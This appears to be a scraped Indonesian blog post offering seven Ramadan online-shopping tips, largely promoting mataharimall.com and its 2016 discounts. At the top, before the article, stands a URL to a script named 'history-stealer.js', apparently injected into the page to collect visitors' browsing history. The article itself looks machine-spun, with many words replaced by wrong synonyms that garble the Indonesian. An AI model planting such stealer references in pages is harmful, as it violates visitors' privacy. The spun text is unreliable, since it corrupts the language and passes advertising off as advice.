-->
https://cdn.statically.io/gh/darylfarahi/ikan/master/history-stealer.js

7 Tips Berbelanja Online Hemat di Bulan Ramadan

Memasuki bulan suci Ramadhan, banyak sekali perusahaan e-commerce lokal maupun asing berlomba-lomba untuk meterapkan promosi untuk menarik konsumen. kamu sempurna galau kan mau belanja dimana? soalnya banyak situs belanja online memperlihatkan acara yang menggiurkan.

setelah 30 hari puasa, ke depannya kita akan berhadapan dengan hari raya lebaran. maka gak heran kalo kamu mulai sibuk ancang-ancang belanja dari sekarang. tapi ingat, kamu harus tetap berhemat ya!

Tips belanja online


dihadapkan dengan ratusan pilihan, kamu harus bisa memilih tempat berbelanja yang sempurna agar tidak hanya menerima harga paling bagus, tapi juga memperoleh manfaat terbanyak. berikut beberapa tips agar kamu dapat berbelanja secara aman dan nyaman:

1. Selidiki Situs Belanja Online

luangkan sedikit waktu untuk mencari tahu lebih banyak mengenai kredibilitas situs belanja online pilihan kamu. riset berdasarkan alexa.com menunjukkan bahwa beberapa situs belanja online ternama, yakni mataharimall, tokopedia, bukalapak, lazada, dan blibli termasuk dalam 50 situs belanja online yang paling banyak dikunjungi di indonesia.


2. Cek koleksi dan bandingkan harga


bagi kamu yang gemar belanja, ada baiknya mencari situs yang mempunyai koleksi barang beragam dengan harga yang pas di kantong. dengan adanya pilihan yang beragam, maka akan metergampangkan kamu untuk menemukan produk yang sempurna. kamu juga bisa membandingkan harga produk serupa dalam beberapa situs belanja online sekaligus untuk menerima harga paling bagus.

3. Pilihan alternatif untuk metode pembayaran


kini, situs-situs belanja online semakin menyaingi ritel offline dalam konteks penyediaan metode pembayaran. sebuah situs berbelanja online yang berafiliasi dengan banyak sekali bank di indonesia, akan menyediakan potongan harga maupun bunga cicilan yang rendah, sebut saja cicilan 0% di mataharimall.com. kuncinya ialah memerhatikan situs-situs belanja online yang menyampaikan diskon sesuai dengan kartu yang dimiliki.
bila tidak mempunyai kartu kredit namun perlu mencicil, pilihlah situs belanja online yang menyediakan layanan cicilan tanpa kartu kredit, mirip penyedia acara super cintaku (super cicilan tanpa kartu).

bila merasa ragu akan kualitas barang saat berbelanja online, pilihlah situs belanja online yang menerapkan sistem cod (cash on delivery), salah satunya mataharimall.com yang merupakan pelopor fitur o2o (online-to-offline) yang mebarangkalikan customer untuk mengambil, membayar, dan mengembalikan produk di seluruh csaudara tertua matahari department store maupun e-locker yang tersebar di pt pos indonesia, stasiun kereta api, sentra perbelanjaan, apartemen, dan universitas.

4. Metode pengiriman barang

saat berbelanja online, kamu harus cermat dalam memilih metode pengiriman barang yang diterapkan situs belanja online. sekalipun harga barang di sebuah situs belanja online terlihat murah, belum tentu biaya yang dikeluarkan akan tetap lebih murah saat ditambahkan dengan biaya kirim. karena itu, sebelum memutuskan untuk membeli, sempurnakan harga akhir yang tertera merupakan harga paling bagus.

5. Memperhitungkan diskon dan promosi


di bulan ramadan, ini banyak situs online yang memperlihatkan banyak sekali macam diskon dan promosi khusus. cermatlah dalam memilih memilih situs belanja yang bisa menyampaikan harga paling bagus, sebut saja gadget yang dijual seharga 1,6 juta pada sebuah situs, dijual seharga 1,8 juta di situs lainnya dengan menyediakan diskon khusus, dan harganya menjadi 1,4 juta saja. karena metode pencarian diskon ini memerlukan upaya lebih, customer sering kali mengabaikan eksistensinya.
“secara bersiklus, mataharimall menghadirkan diskon dan promosi. kami mengharapkan agar customer dapat teliti dalam mencari diskon yang disediakan oleh ecommerce lainnya juga, misalnya dengan memperhatikan banner website, newsletter, membuka halaman kategori produk pilihan, dan lain-lain. tentunya customer tidak ingin melewatkan kesempatan memeroleh barang lebih murah dengan diskon dan promosi khusus,” terang regan dwinanda, head of communication and partnership mataharimall.com.

6. Berlangganan newsletter dan mengikuti akun media umum ecommerce favorit


pengunjung situs berbelanja online acapkali dihadapkan dengan pilihan untuk memasukkan alamat email dan penawaran berlangganan newsletter. rupanya, bagi individu-individu yang gemar berbelanja online, newsletter dapat menjadi fitur yang praktis. melalui newsletter, kamu dapat selalu mengetahui koleksi, promo, dan penawaran menarik dari situs-situs tersebut. fitur ini juga akan mempertergampang kamu dalam membandingkan harga antara e-commerce satu dengan yang lainnya.
jika berlangganan newsletter dianggap memenuhi kotak pesan dari akun e-mail, media umum milik e-commerce, mirip facebook, instagram, twitter, dan line pun dapat dijadikan sebagai ajang memeroleh info serupa. selain itu, pemegang akun media umum milik e-commerce tertentu juga aktif menyampaikan jawaban atas pertanyaan-pertanyaan yang masuk.

7. Mencari acara kejutan yang menyenangkan


selama bulan juni 2016, mataharimall.com akan memanjakan kamu dengan pesta sale gila – gilaan (petasan), yakni potongan harga 99% untuk beberapa barang pilihan yang tersedia dalam jumlah terbatas.
“memang barang-barang yang didiskon 99% hanya tersedia dalam jumlah sedikit. kami mengharapkan partisipasi dan kerja sama pelanggan untuk terus memantau media umum mataharimall agar senantiasa mengetahui mengenai produk idaman yang sedang didiskon. melalui media umum, mataharimall juga mengumumkan nama pelanggan beruntung yang berhasil menerima produk incaran dengan harga miring,” tambah regan.

selain menyediakan diskon besar, mataharimall juga menyediakan cash back sebesar 99% untuk 9 customer beruntung yang dipilih secara tak terencana seminggu sekali oleh mataharimall.com. mirip yang dialami oleh bapak fitrio ari, salah satu dari 9 pemenang yang menerima cash-back 24 juta dari pembelian motor yamaha nmax di mataharimall.com.

bila memerhatikan tujuh poin di atas, niscaya kamu tidak perlu cemas akan mengeluarkan uang lebih banyak dari yang seharusnya. karena itu, cermat dalam memilih ialah kunci untuk meraih keuntungan melalui situs-situs belanja online di bulan yang penuh berkah ini.

Subscribe to receive free email updates: